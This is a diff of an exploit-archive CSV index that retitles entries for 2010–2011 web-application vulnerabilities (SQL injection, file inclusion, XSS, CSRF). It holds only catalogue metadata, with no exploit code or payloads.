Injection",2010-02-13,Gamoscu,php,webapps,0 -11437,platforms/php/webapps/11437.txt,"ZeusCMS 0.2 - (Database Backup Dump / Local File Inclusion) Multiple Vulnerabilities",2010-02-13,ViRuSMaN,php,webapps,0 +11437,platforms/php/webapps/11437.txt,"ZeusCMS 0.2 - Database Backup Dump / Local File Inclusion",2010-02-13,ViRuSMaN,php,webapps,0 11440,platforms/php/webapps/11440.txt,"InterTech Co 1.0 - SQL Injection",2010-02-13,Red-D3v1L,php,webapps,0 11441,platforms/php/webapps/11441.txt,"WordPress 2.9 - Failure to Restrict URL Access",2010-02-13,tmacuk,php,webapps,0 11442,platforms/php/webapps/11442.txt,"PEAR 1.9.0 - Multiple Remote File Inclusion",2010-02-14,eidelweiss,php,webapps,0 @@ -22417,7 +22420,7 @@ id,file,description,date,author,platform,type,port 11447,platforms/php/webapps/11447.txt,"Joomla! Component Jw_allVideos - Arbitrary File Download",2010-02-14,"Pouya Daneshmand",php,webapps,0 11449,platforms/php/webapps/11449.txt,"Joomla! Component com_videos - SQL Injection",2010-02-14,snakespc,php,webapps,0 11450,platforms/php/webapps/11450.txt,"File Upload Manager 1.3 - Exploit",2010-02-14,ROOT_EGY,php,webapps,0 -11452,platforms/php/webapps/11452.txt,"Katalog Stron Hurricane 1.3.5 - (Remote File Inclusion / SQL Injection) Multiple Vulnerabilities",2010-02-14,kaMtiEz,php,webapps,0 +11452,platforms/php/webapps/11452.txt,"Katalog Stron Hurricane 1.3.5 - Remote File Inclusion / SQL Injection",2010-02-14,kaMtiEz,php,webapps,0 11455,platforms/php/webapps/11455.txt,"Généré par KDPics 1.18 - Remote Add Admin",2010-02-15,snakespc,php,webapps,0 11456,platforms/php/webapps/11456.txt,"superengine CMS (Custom Pack) - SQL Injection",2010-02-15,10n1z3d,php,webapps,0 11458,platforms/php/webapps/11458.txt,"WordPress Plugin Copperleaf Photolog 0.16 - SQL Injection",2010-02-15,kaMtiEz,php,webapps,0 @@ -22446,7 +22449,7 @@ id,file,description,date,author,platform,type,port 11490,platforms/php/webapps/11490.txt,"PunBBAnnuaire 0.4 - Blind SQL Injection",2010-02-17,Metropolis,php,webapps,0 11494,platforms/php/webapps/11494.txt,"Joomla! Component com_otzivi - Local File Inclusion",2010-02-18,AtT4CKxT3rR0r1ST,php,webapps,0 11495,platforms/php/webapps/11495.txt,"CubeCart - 'index.php' SQL Injection",2010-02-18,AtT4CKxT3rR0r1ST,php,webapps,0 -11496,platforms/php/webapps/11496.txt,"Open Source Classifieds 1.1.0 - Alpha (OSClassi) Multiple Vulnerabilities",2010-02-18,"Sioma Labs",php,webapps,0 +11496,platforms/php/webapps/11496.txt,"Open Source Classifieds 1.1.0 Alpha (OSClassi) - SQL Injection / Cross-Site Scripting / Arbitrary Admin Change",2010-02-18,"Sioma Labs",php,webapps,0 11498,platforms/php/webapps/11498.txt,"Joomla! Plugin Core Design Scriptegrator - Local File Inclusion",2010-02-18,"S2 Crew",php,webapps,0 11502,platforms/php/webapps/11502.txt,"phpAutoVideo - Cross-Site Request Forgery",2010-02-19,GoLdeN-z3r0,php,webapps,0 11503,platforms/php/webapps/11503.txt,"Litespeed Web Server 4.0.12 - Cross-Site Request Forgery (Add Admin) / Cross-Site Scripting",2010-02-19,d1dn0t,php,webapps,0 @@ -22501,7 +22504,7 @@ id,file,description,date,author,platform,type,port 11585,platforms/php/webapps/11585.txt,"phpCDB 1.0 - Local File Inclusion",2010-02-27,cr4wl3r,php,webapps,0 11586,platforms/php/webapps/11586.txt,"phpRAINCHECK 1.0.1 - SQL Injection",2010-02-27,cr4wl3r,php,webapps,0 11587,platforms/php/webapps/11587.txt,"ProMan 0.1.1 - Multiple File Inclusion",2010-02-27,cr4wl3r,php,webapps,0 -11588,platforms/php/webapps/11588.txt,"phpMySite - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2010-02-27,Crux,php,webapps,0 +11588,platforms/php/webapps/11588.txt,"phpMySite - Cross-Site Scripting / SQL Injection",2010-02-27,Crux,php,webapps,0 11589,platforms/asp/webapps/11589.txt,"Pre Classified Listings - SQL Injection",2010-02-27,Crux,asp,webapps,0 11592,platforms/php/webapps/11592.txt,"Scripts Feed Business Directory - SQL Injection",2010-02-27,Crux,php,webapps,0 11593,platforms/php/webapps/11593.txt,"Uiga Fan Club 1.0 - (Authentication Bypass) SQL Injection",2010-02-27,cr4wl3r,php,webapps,0 @@ -22639,7 +22642,7 @@ id,file,description,date,author,platform,type,port 11805,platforms/php/webapps/11805.txt,"phpscripte24 Niedrig Gebote Pro Auktions System II - Blind SQL Injection",2010-03-18,"Easy Laster",php,webapps,0 11806,platforms/php/webapps/11806.txt,"nensor CMS 2.01 - Multiple Vulnerabilities",2010-03-18,cr4wl3r,php,webapps,0 11807,platforms/php/webapps/11807.txt,"SOFTSAURUS 2.01 - Multiple Remote File Inclusion",2010-03-18,cr4wl3r,php,webapps,0 -11808,platforms/php/webapps/11808.txt,"quality point 1.0 newsfeed - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2010-03-19,Red-D3v1L,php,webapps,0 +11808,platforms/php/webapps/11808.txt,"quality point 1.0 newsfeed - SQL Injection / Cross-Site Scripting",2010-03-19,Red-D3v1L,php,webapps,0 11811,platforms/php/webapps/11811.txt,"PHPscripte24 Preisschlacht Liveshop System SQL Injection - (seite&aid) index.php Exploit",2010-03-19,"Easy Laster",php,webapps,0 11813,platforms/php/webapps/11813.txt,"DirectAdmin 1.34.4 - Multiple Cross-Site Request Forgerys",2010-03-19,K053,php,webapps,0 11814,platforms/php/webapps/11814.txt,"Joomla! Component & Plugin JE Tooltip 1.0 - Local File Inclusion",2010-03-19,"Chip d3 bi0s",php,webapps,0 @@ -22763,7 +22766,7 @@ id,file,description,date,author,platform,type,port 12015,platforms/php/webapps/12015.txt,"Joomla! Component 'com_menu' - SQL Injection",2010-04-02,"DevilZ TM",php,webapps,0 12016,platforms/php/webapps/12016.txt,"Joomla! Component com_ops - SQL Injection",2010-04-02,"DevilZ TM",php,webapps,0 12017,platforms/php/webapps/12017.txt,"Joomla! Component com_football - SQL Injection",2010-04-02,"DevilZ TM",php,webapps,0 -12018,platforms/php/webapps/12018.txt,"DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities",2010-04-02,eidelweiss,php,webapps,0 +12018,platforms/php/webapps/12018.txt,"DynPG CMS 4.1.0 - popup.php / counter.php Multiple Vulnerabilities",2010-04-02,eidelweiss,php,webapps,0 12019,platforms/php/webapps/12019.txt,"Velhost Uploader Script 1.2 - Local File Inclusion",2010-04-02,cr4wl3r,php,webapps,0 12021,platforms/php/webapps/12021.txt,"68kb 68KB Base 1.0.0rc3 - Cross-Site Request Forgery (Admin)",2010-04-02,"Jelmer de Hen",php,webapps,0 12022,platforms/php/webapps/12022.txt,"68KB Knowledge Base 1.0.0rc3 - Cross-Site Request Forgery (Edit Main Settings)",2010-04-02,"Jelmer de Hen",php,webapps,0 @@ -22799,7 +22802,7 @@ id,file,description,date,author,platform,type,port 12068,platforms/php/webapps/12068.txt,"Joomla! Component LoginBox - Local File Inclusion",2010-04-05,Vrs-hCk,php,webapps,0 12069,platforms/php/webapps/12069.txt,"Joomla! Component 'com_bca-rss-syndicator' - Local File Inclusion",2010-04-05,Vrs-hCk,php,webapps,0 12070,platforms/php/webapps/12070.txt,"Joomla! Component Magic Updater - Local File Inclusion",2010-04-05,Vrs-hCk,php,webapps,0 -12071,platforms/php/webapps/12071.txt,"jevoncms - (Local File Inclusion / Remote File Inclusion) Multiple Vulnerabilities",2010-04-05,eidelweiss,php,webapps,0 +12071,platforms/php/webapps/12071.txt,"jevoncms - Local File Inclusion / Remote File Inclusion",2010-04-05,eidelweiss,php,webapps,0 12075,platforms/php/webapps/12075.txt,"LionWiki 3.x - 'index.php' Arbitrary File Upload",2010-04-05,ayastar,php,webapps,0 12076,platforms/php/webapps/12076.pl,"ilchClan 1.0.5 - 'cid' SQL Injection",2010-04-05,"Easy Laster",php,webapps,0 12077,platforms/php/webapps/12077.txt,"Joomla! Component News Portal 1.5.x - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0 @@ -22922,7 +22925,7 @@ id,file,description,date,author,platform,type,port 12254,platforms/php/webapps/12254.txt,"FCKEditor Core - (FileManager test.html) Arbitrary File Upload (1)",2010-04-16,Mr.MLL,php,webapps,0 12256,platforms/php/webapps/12256.txt,"ilchClan 1.0.5B - SQL Injection",2010-04-16,"Easy Laster",php,webapps,0 12257,platforms/php/webapps/12257.txt,"Joomla! Component 'com_manager' 1.5.3 - 'id' Parameter SQL Injection",2010-04-16,"Islam DefenDers Mr.HaMaDa",php,webapps,0 -12260,platforms/php/webapps/12260.txt,"SIESTTA 2.0 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2010-04-16,JosS,php,webapps,0 +12260,platforms/php/webapps/12260.txt,"SIESTTA 2.0 - Local File Inclusion / Cross-Site Scripting",2010-04-16,JosS,php,webapps,0 12262,platforms/php/webapps/12262.php,"Zyke CMS 1.1 - (Authentication Bypass) SQL Injection",2010-04-16,"Giuseppe 'giudinvx' D'Inverno",php,webapps,0 12266,platforms/php/webapps/12266.txt,"60 cycleCMS 2.5.2 - Cross-Site Request Forgery (Change 'Username' and Password)",2010-04-16,EL-KAHINA,php,webapps,0 12267,platforms/php/webapps/12267.txt,"WebAdmin - Arbitrary File Upload",2010-04-16,DigitALL,php,webapps,0 @@ -23237,7 +23240,7 @@ id,file,description,date,author,platform,type,port 12729,platforms/php/webapps/12729.txt,"Blox CMS - SQL Injection",2010-05-24,CoBRa_21,php,webapps,0 12730,platforms/multiple/webapps/12730.txt,"ProWeb Design - SQL Injection",2010-05-24,cyberlog,multiple,webapps,0 12731,platforms/php/webapps/12731.txt,"Webloader 8 - SQL Injection",2010-05-24,ByEge,php,webapps,0 -12732,platforms/php/webapps/12732.php,"JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities",2010-05-24,eidelweiss,php,webapps,0 +12732,platforms/php/webapps/12732.php,"JV2 Folder Gallery 3.1.1 - 'popup_slideshow.php' Multiple Vulnerabilities",2010-05-24,eidelweiss,php,webapps,0 12734,platforms/asp/webapps/12734.txt,"Blaze Apps - Multiple Vulnerabilities",2010-05-24,AmnPardaz,asp,webapps,0 12735,platforms/php/webapps/12735.txt,"Nitro Web Gallery - SQL Injection",2010-05-25,cyberlog,php,webapps,0 12736,platforms/php/webapps/12736.txt,"Website Design and Hosting By Netricks Inc - 'news.php' SQL Injection",2010-05-25,"Dr.SiLnT HilL",php,webapps,0 @@ -23254,7 +23257,7 @@ id,file,description,date,author,platform,type,port 12761,platforms/php/webapps/12761.txt,"GlobalWebTek Design - SQL Injection",2010-05-27,cyberlog,php,webapps,0 12763,platforms/php/webapps/12763.txt,"File Share scriptFile share - SQL Injection",2010-05-27,MouDy-Dz,php,webapps,0 12766,platforms/php/webapps/12766.txt,"PPhlogger 2.2.5 - (trace.php) Remote Command Execution",2010-05-27,"Sn!pEr.S!Te Hacker",php,webapps,0 -12767,platforms/php/webapps/12767.txt,"parlic Design - (SQL Injection / Cross-Site Scripting / HTML Injection) Multiple Vulnerabilities",2010-05-27,XroGuE,php,webapps,0 +12767,platforms/php/webapps/12767.txt,"parlic Design - SQL Injection / Cross-Site Scripting / HTML Injection",2010-05-27,XroGuE,php,webapps,0 12768,platforms/php/webapps/12768.txt,"Hampshire Trading Standards Script - SQL Injection",2010-05-27,Mr.P3rfekT,php,webapps,0 12769,platforms/php/webapps/12769.txt,"Joomla! Component 'com_mediqna' 1.1 - Local File Inclusion",2010-05-27,kaMtiEz,php,webapps,0 12770,platforms/php/webapps/12770.txt,"toronja CMS - SQL Injection",2010-05-27,cyberlog,php,webapps,0 @@ -23273,7 +23276,7 @@ id,file,description,date,author,platform,type,port 12788,platforms/php/webapps/12788.txt,"Marketing Web Design - Multiple Vulnerabilities",2010-05-29,XroGuE,php,webapps,0 12790,platforms/php/webapps/12790.txt,"Nucleus Plugin Twitter - Remote File Inclusion",2010-05-29,AntiSecurity,php,webapps,0 12791,platforms/php/webapps/12791.txt,"Aim Web Design - Multiple Vulnerabilities",2010-05-29,XroGuE,php,webapps,0 -12792,platforms/php/webapps/12792.txt,"MileHigh Creative - (SQL Injection / Cross-Site Scripting / HTML Injection) Multiple Vulnerabilities",2010-05-29,XroGuE,php,webapps,0 +12792,platforms/php/webapps/12792.txt,"MileHigh Creative - SQL Injection / Cross-Site Scripting / HTML Injection",2010-05-29,XroGuE,php,webapps,0 12793,platforms/php/webapps/12793.txt,"Cosmos Solutions CMS - SQL Injection",2010-05-29,cyberlog,php,webapps,0 12794,platforms/php/webapps/12794.txt,"Cosmos Solutions CMS - (id= / page=) SQL Injection",2010-05-29,gendenk,php,webapps,0 12796,platforms/php/webapps/12796.txt,"Joomla! Component BF Quiz 1.0 - SQL Injection (2)",2010-05-29,"Valentin Hoebel",php,webapps,0 @@ -23289,7 +23292,7 @@ id,file,description,date,author,platform,type,port 12812,platforms/php/webapps/12812.txt,"Joomla! Component 'com_quran' - SQL Injection",2010-05-30,r3m1ck,php,webapps,0 12813,platforms/php/webapps/12813.txt,"WsCMS - Multiple SQL Injections",2010-05-31,cyberlog,php,webapps,0 12814,platforms/php/webapps/12814.txt,"Joomla! Component 'com_g2bridge' - Local File Inclusion",2010-05-31,akatsuchi,php,webapps,0 -12817,platforms/php/webapps/12817.txt,"QuickTalk 1.2 - (Source Code Disclosure) Multiple Vulnerabilities",2010-05-31,indoushka,php,webapps,0 +12817,platforms/php/webapps/12817.txt,"QuickTalk 1.2 - Source Code Disclosure",2010-05-31,indoushka,php,webapps,0 12818,platforms/php/webapps/12818.txt,"e107 0.7.21 full - Remote File Inclusion / Cross-Site Scripting",2010-05-31,indoushka,php,webapps,0 12819,platforms/php/webapps/12819.txt,"Persian E107 - Cross-Site Scripting",2010-05-31,indoushka,php,webapps,0 12820,platforms/php/webapps/12820.txt,"Visitor Logger - 'banned.php' Remote File Inclusion",2010-05-31,bd0rk,php,webapps,0 @@ -23490,7 +23493,7 @@ id,file,description,date,author,platform,type,port 13990,platforms/asp/webapps/13990.txt,"Boat Classifieds - SQL Injection",2010-06-22,Sangteamtham,asp,webapps,0 13991,platforms/php/webapps/13991.txt,"Softbiz PHP FAQ Script - Blind SQL Injection",2010-06-22,Sangteamtham,php,webapps,0 13992,platforms/php/webapps/13992.txt,"Pre PHP Classifieds - SQL Injection",2010-06-22,Sangteamtham,php,webapps,0 -13993,platforms/php/webapps/13993.txt,"K-Search - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2010-06-22,Sangteamtham,php,webapps,0 +13993,platforms/php/webapps/13993.txt,"K-Search - SQL Injection / Cross-Site Scripting",2010-06-22,Sangteamtham,php,webapps,0 14512,platforms/php/webapps/14512.txt,"Concept E-Commerce - SQL Injection",2010-07-31,gendenk,php,webapps,0 13995,platforms/asp/webapps/13995.txt,"Boat Classifieds - 'printdetail.asp?Id' SQL Injection",2010-06-23,CoBRa_21,asp,webapps,0 13996,platforms/php/webapps/13996.txt,"Pre Multiple Vendors Shopping Malls - 'products.php?sid' SQL Injection",2010-06-23,CoBRa_21,php,webapps,0 @@ -23675,7 +23678,7 @@ id,file,description,date,author,platform,type,port 14325,platforms/php/webapps/14325.txt,"My Kazaam Notes Management System - Multiple Vulnerabilities",2010-07-10,"L0rd CrusAd3r",php,webapps,0 14326,platforms/php/webapps/14326.txt,"My Kazaam Address & Contact ORGanizer - SQL Injection",2010-07-10,v3n0m,php,webapps,0 14327,platforms/php/webapps/14327.txt,"Joomla! Component 'Rapid-Recipe' - Persistent Cross-Site Scripting",2010-07-10,Sid3^effects,php,webapps,0 -14328,platforms/php/webapps/14328.html,"Macs CMS 1.1.4 - (Cross-Site Scripting / Cross-Site Request Forgery) Multiple Vulnerabilities",2010-07-11,10n1z3d,php,webapps,0 +14328,platforms/php/webapps/14328.html,"Macs CMS 1.1.4 - Cross-Site Scripting / Cross-Site Request Forgery",2010-07-11,10n1z3d,php,webapps,0 14329,platforms/php/webapps/14329.html,"Frog CMS 0.9.5 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-07-11,10n1z3d,php,webapps,0 14330,platforms/php/webapps/14330.html,"TomatoCart 1.0.1 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-07-11,10n1z3d,php,webapps,0 14331,platforms/php/webapps/14331.html,"TomatoCMS 2.0.5 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-07-11,10n1z3d,php,webapps,0 @@ -23813,7 +23816,7 @@ id,file,description,date,author,platform,type,port 14644,platforms/php/webapps/14644.html,"Saurus CMS Admin Panel - Multiple Cross-Site Request Forgery Vulnerabilities",2010-08-14,"Fady Mohammed Osman",php,webapps,0 14645,platforms/php/webapps/14645.txt,"Sports Accelerator Suite 2.0 - (news_id) SQL Injection",2010-08-14,LiquidWorm,php,webapps,0 14647,platforms/php/webapps/14647.php,"PHP-Fusion - Local File Inclusion",2010-08-15,MoDaMeR,php,webapps,0 -14648,platforms/php/webapps/14648.txt,"Guestbook Script PHP - (Cross-Site Scripting / HTML Injection) Multiple Vulnerabilities",2010-08-15,"AnTi SeCuRe",php,webapps,0 +14648,platforms/php/webapps/14648.txt,"Guestbook Script PHP - Cross-Site Scripting / HTML Injection",2010-08-15,"AnTi SeCuRe",php,webapps,0 14650,platforms/php/webapps/14650.html,"Zomplog 3.9 - Cross-Site Scripting / Cross-Site Request Forgery",2010-08-15,10n1z3d,php,webapps,0 14654,platforms/php/webapps/14654.php,"CMSQLite 1.2 / CMySQLite 1.3.1 - Remote Code Execution",2010-08-15,BlackHawk,php,webapps,0 14655,platforms/php/webapps/14655.txt,"Joomla! Component 'com_equipment' - SQL Injection",2010-08-16,Forza-Dz,php,webapps,0 @@ -23856,7 +23859,7 @@ id,file,description,date,author,platform,type,port 14827,platforms/php/webapps/14827.py,"Blogman 0.7.1 - 'profile.php' SQL Injection",2010-08-28,"Ptrace Security",php,webapps,0 14829,platforms/php/webapps/14829.txt,"CF Image Hosting Script 1.3 - (settings.cdb) Information Disclosure",2010-08-28,Dr.$audi,php,webapps,0 14833,platforms/php/webapps/14833.txt,"vBulletin 3.8.4 / 3.8.5 - Registration Bypass",2010-08-29,"Immortal Boy",php,webapps,0 -14834,platforms/php/webapps/14834.txt,"Max's Guestbook - (HTML Injection / Cross-Site Scripting) Multiple Vulnerabilities",2010-08-29,"MiND C0re",php,webapps,0 +14834,platforms/php/webapps/14834.txt,"Max's Guestbook - HTML Injection / Cross-Site Scripting",2010-08-29,"MiND C0re",php,webapps,0 14835,platforms/php/webapps/14835.txt,"Multi-lingual E-Commerce System 0.2 - Multiple Remote File Inclusion",2010-08-29,JosS,php,webapps,0 14837,platforms/php/webapps/14837.txt,"CF Image Hosting Script 1.3.8 - Remote File Inclusion",2010-08-29,"FoX HaCkEr",php,webapps,0 14838,platforms/php/webapps/14838.txt,"Seagull 0.6.7 - SQL Injection",2010-08-29,Sweet,php,webapps,0 @@ -23967,7 +23970,7 @@ id,file,description,date,author,platform,type,port 15124,platforms/asp/webapps/15124.txt,"ndCMS - SQL Injection",2010-09-27,Abysssec,asp,webapps,0 15126,platforms/php/webapps/15126.txt,"Entrans - SQL Injection",2010-09-27,keracker,php,webapps,0 15130,platforms/cgi/webapps/15130.sh,"Barracuda Networks Spam & Virus Firewall 4.1.1.021 - Remote Configuration Retrieval",2010-09-27,ShadowHatesYou,cgi,webapps,0 -15128,platforms/win_x86/webapps/15128.txt,"Allpc 2.5 osCommerce - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2010-09-27,**RoAd_KiLlEr**,win_x86,webapps,80 +15128,platforms/win_x86/webapps/15128.txt,"Allpc 2.5 osCommerce - SQL Injection / Cross-Site Scripting",2010-09-27,**RoAd_KiLlEr**,win_x86,webapps,80 15198,platforms/php/webapps/15198.txt,"Aprox CMS Engine 6.0 - Multiple Vulnerabilities",2010-10-03,"Stephan Sattler",php,webapps,0 15135,platforms/php/webapps/15135.txt,"Car Portal 2.0 - Blind SQL Injection",2010-09-27,**RoAd_KiLlEr**,php,webapps,0 15143,platforms/php/webapps/15143.txt,"e107 0.7.23 - SQL Injection",2010-09-28,"High-Tech Bridge SA",php,webapps,0 @@ -23997,7 +24000,7 @@ id,file,description,date,author,platform,type,port 15177,platforms/php/webapps/15177.pl,"iGaming CMS 1.5 - Blind SQL Injection",2010-10-01,plucky,php,webapps,0 15185,platforms/asp/webapps/15185.txt,"SmarterMail 7.x (7.2.3925) - Persistent Cross-Site Scripting",2010-10-02,sqlhacker,asp,webapps,0 15189,platforms/asp/webapps/15189.txt,"SmarterMail 7.x - (7.2.3925) LDAP Injection",2010-10-02,sqlhacker,asp,webapps,0 -15191,platforms/asp/webapps/15191.txt,"TradeMC E-Ticaret - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2010-10-02,KnocKout,asp,webapps,0 +15191,platforms/asp/webapps/15191.txt,"TradeMC E-Ticaret - SQL Injection / Cross-Site Scripting",2010-10-02,KnocKout,asp,webapps,0 15194,platforms/php/webapps/15194.txt,"TinyMCE MCFileManager 2.1.2 - Arbitrary File Upload",2010-10-03,Hackeri-AL,php,webapps,0 15200,platforms/php/webapps/15200.txt,"FAQMasterFlex 1.2 - SQL Injection",2010-10-04,cyb3r.anbu,php,webapps,0 15204,platforms/php/webapps/15204.txt,"DNET Live-Stats 0.8 - Local File Inclusion",2010-10-04,blake,php,webapps,0 @@ -24005,7 +24008,7 @@ id,file,description,date,author,platform,type,port 15207,platforms/php/webapps/15207.txt,"Uebimiau Webmail 3.2.0-2.0 - Local File Inclusion",2010-10-04,blake,php,webapps,0 15208,platforms/php/webapps/15208.txt,"CuteNews - 'page' Parameter Local File Inclusion",2010-10-05,eidelweiss,php,webapps,0 15209,platforms/php/webapps/15209.txt,"SPAW Editor 2.0.8.1 - Local File Inclusion",2010-10-05,"soorakh kos",php,webapps,0 -15210,platforms/php/webapps/15210.txt,"Cag CMS 0.2 - (Cross-Site Scripting / Blind SQL Injection) Multiple Vulnerabilities",2010-10-05,Shamus,php,webapps,0 +15210,platforms/php/webapps/15210.txt,"Cag CMS 0.2 - Cross-Site Scripting / Blind SQL Injection",2010-10-05,Shamus,php,webapps,0 15284,platforms/php/webapps/15284.txt,"phpCheckZ 1.1.0 - Blind SQL Injection",2010-10-19,"Salvatore Fresta",php,webapps,0 15217,platforms/php/webapps/15217.txt,"Feindura File Manager 1.0(rc) - Arbitrary File Upload",2010-10-07,KnocKout,php,webapps,0 15218,platforms/asp/webapps/15218.txt,"xWeblog 2.2 - (oku.asp?makale_id) SQL Injection",2010-10-07,KnocKout,asp,webapps,0 @@ -24017,7 +24020,7 @@ id,file,description,date,author,platform,type,port 15225,platforms/php/webapps/15225.txt,"VideoDB 3.0.3 - Multiple Vulnerabilities",2010-10-09,Valentin,php,webapps,0 15268,platforms/php/webapps/15268.txt,"WikiWebHelp 0.3.3 - Insecure Cookie Handling",2010-10-17,FuRty,php,webapps,0 39571,platforms/php/webapps/39571.txt,"ZenPhoto 1.4.11 - Remote File Inclusion",2016-03-17,"Curesec Research Team",php,webapps,80 -15269,platforms/php/webapps/15269.txt,"Tastydir 1.2 - (1216) Multiple Vulnerabilities",2010-10-17,R,php,webapps,0 +15269,platforms/php/webapps/15269.txt,"Tastydir 1.2 (1216) - Multiple Vulnerabilities",2010-10-17,R,php,webapps,0 15227,platforms/php/webapps/15227.txt,"PHP-Fusion Mod Mg User Fotoalbum 1.0.1 - SQL Injection",2010-10-10,"Easy Laster",php,webapps,0 15592,platforms/php/webapps/15592.txt,"sahitya graphics CMS - Multiple Vulnerabilities",2010-11-21,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 15593,platforms/php/webapps/15593.html,"Cpanel 11.x - Cross-Site Request Forgery (Edit E-mail)",2010-11-21,"Mon7rF .",php,webapps,0 @@ -24224,7 +24227,7 @@ id,file,description,date,author,platform,type,port 15681,platforms/asp/webapps/15681.txt,"ASPSiteWare JobPost 1.0 - SQL Injection",2010-12-04,R4dc0re,asp,webapps,0 15682,platforms/asp/webapps/15682.txt,"ASPSiteWare ASP Gallery 1.0 - SQL Injection",2010-12-04,R4dc0re,asp,webapps,0 15683,platforms/asp/webapps/15683.txt,"ASPSiteWare Contact Directory 1.0 - SQL Injection",2010-12-04,R4dc0re,asp,webapps,0 -15684,platforms/php/webapps/15684.txt,"WordPress - 'do_trackbacks()' function SQL Injection",2010-12-05,M4g,php,webapps,0 +15684,platforms/php/webapps/15684.txt,"WordPress 3.0.1 - 'do_trackbacks()' function SQL Injection",2010-12-05,M4g,php,webapps,0 15685,platforms/php/webapps/15685.html,"PHPKF Forum 1.80 - profil_degistir.php Cross-Site Request Forgery",2010-12-05,FreWaL,php,webapps,0 15686,platforms/asp/webapps/15686.txt,"Gatesoft Docusafe 4.1.0 - SQL Injection",2010-12-05,R4dc0re,asp,webapps,0 15687,platforms/asp/webapps/15687.txt,"Ecommercemax Solutions Digital Goods Seller - SQL Injection",2010-12-05,R4dc0re,asp,webapps,0 @@ -24339,7 +24342,7 @@ id,file,description,date,author,platform,type,port 15913,platforms/php/webapps/15913.pl,"PhpGedView 4.2.3 - Local File Inclusion",2011-01-05,dun,php,webapps,0 15961,platforms/php/webapps/15961.txt,"TinyBB 1.2 - SQL Injection",2011-01-10,Aodrulez,php,webapps,0 15918,platforms/jsp/webapps/15918.txt,"Openfire 3.6.4 - Multiple Cross-Site Request Forgery Vulnerabilities",2011-01-06,"Riyaz Ahemed Walikar",jsp,webapps,0 -15920,platforms/php/webapps/15920.txt,"F3Site 2011 alfa 1 - (Cross-Site Scripting / Cross-Site Request Forgery) Multiple Vulnerabilities",2011-01-06,"High-Tech Bridge SA",php,webapps,0 +15920,platforms/php/webapps/15920.txt,"F3Site 2011 alfa 1 - Cross-Site Scripting / Cross-Site Request Forgery",2011-01-06,"High-Tech Bridge SA",php,webapps,0 15921,platforms/php/webapps/15921.txt,"phpMySport 1.4 - SQL Injection / Authentication Bypass / Full Path Disclosure",2011-01-06,"High-Tech Bridge SA",php,webapps,0 15922,platforms/php/webapps/15922.txt,"Phenotype CMS 3.0 - SQL Injection",2011-01-06,"High-Tech Bridge SA",php,webapps,0 15923,platforms/php/webapps/15923.txt,"PHP MicroCMS 1.0.1 - Cross-Site Request Forgery / Cross-Site Scripting",2011-01-06,"High-Tech Bridge SA",php,webapps,0 @@ -24383,7 +24386,7 @@ id,file,description,date,author,platform,type,port 16019,platforms/php/webapps/16019.txt,"phpCMS 2008 - SQL Injection",2011-01-20,R3d-D3V!L,php,webapps,0 16027,platforms/php/webapps/16027.txt,"phpCMS 9.0 - Blind SQL Injection",2011-01-22,eidelweiss,php,webapps,0 16028,platforms/php/webapps/16028.txt,"cultbooking 2.0.4 - Multiple Vulnerabilities",2011-01-22,LiquidWorm,php,webapps,0 -16034,platforms/php/webapps/16034.txt,"PHP Coupon Script 6.0 - (bus) Blind SQL Injection",2011-01-23,"BorN To K!LL",php,webapps,0 +16034,platforms/php/webapps/16034.txt,"PHP Coupon Script 6.0 - 'bus' Parameter Blind SQL Injection",2011-01-23,"BorN To K!LL",php,webapps,0 16037,platforms/php/webapps/16037.html,"PHP Link Directory 4.1.0 - Cross-Site Request Forgery (Add Admin)",2011-01-23,AtT4CKxT3rR0r1ST,php,webapps,0 16060,platforms/php/webapps/16060.txt,"comercioplus 5.6 - Multiple Vulnerabilities",2011-01-27,"Daniel Godoy",php,webapps,0 16044,platforms/php/webapps/16044.txt,"ab Web CMS 1.35 - Multiple Vulnerabilities",2011-01-25,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 @@ -24431,7 +24434,7 @@ id,file,description,date,author,platform,type,port 16168,platforms/php/webapps/16168.txt,"RunCMS 2.2.2 - Multiple Vulnerabilities",2011-02-14,"High-Tech Bridge SA",php,webapps,0 16143,platforms/php/webapps/16143.txt,"MihanTools Script 1.3.3 - SQL Injection",2011-02-09,WHITE_DEVIL,php,webapps,0 16144,platforms/php/webapps/16144.txt,"WordPress Plugin Enable Media Replace - Multiple Vulnerabilities",2011-02-09,"Ulf Harnhammar",php,webapps,0 -16183,platforms/php/webapps/16183.txt,"GAzie 5.10 - (Login Parameter) Multiple Vulnerabilities",2011-02-17,LiquidWorm,php,webapps,0 +16183,platforms/php/webapps/16183.txt,"GAzie 5.10 - Login Parameter Multiple Vulnerabilities",2011-02-17,LiquidWorm,php,webapps,0 16165,platforms/php/webapps/16165.txt,"AWCM 2.2 Final - Persistent Cross-Site Script",2011-02-14,_84kur10_,php,webapps,0 16148,platforms/php/webapps/16148.txt,"SourceBans 1.4.7 - Cross-Site Scripting",2011-02-09,Sw1tCh,php,webapps,0 16152,platforms/multiple/webapps/16152.py,"LocatePC 1.05 (Ligatt Version + Others) - SQL Injection",2011-02-10,anonymous,multiple,webapps,0 @@ -25041,7 +25044,7 @@ id,file,description,date,author,platform,type,port 18056,platforms/php/webapps/18056.txt,"jbShop - e107 7 CMS Plugin - SQL Injection",2011-10-31,"Robert Cooper",php,webapps,0 18058,platforms/php/webapps/18058.txt,"Joomla! Component Alameda 1.0 - SQL Injection",2011-10-31,kaMtiEz,php,webapps,0 18061,platforms/hardware/webapps/18061.txt,"ZTE ZXDSL 831IIV7.5.0a_Z29_OV - Multiple Vulnerabilities",2011-11-01,"mehdi boukazoula",hardware,webapps,0 -18063,platforms/php/webapps/18063.txt,"BST - BestShopPro (nowosci.php) Multiple Vulnerabilities",2011-11-02,CoBRa_21,php,webapps,0 +18063,platforms/php/webapps/18063.txt,"BST (BestShopPro) - 'nowosci.php' Multiple Vulnerabilities",2011-11-02,CoBRa_21,php,webapps,0 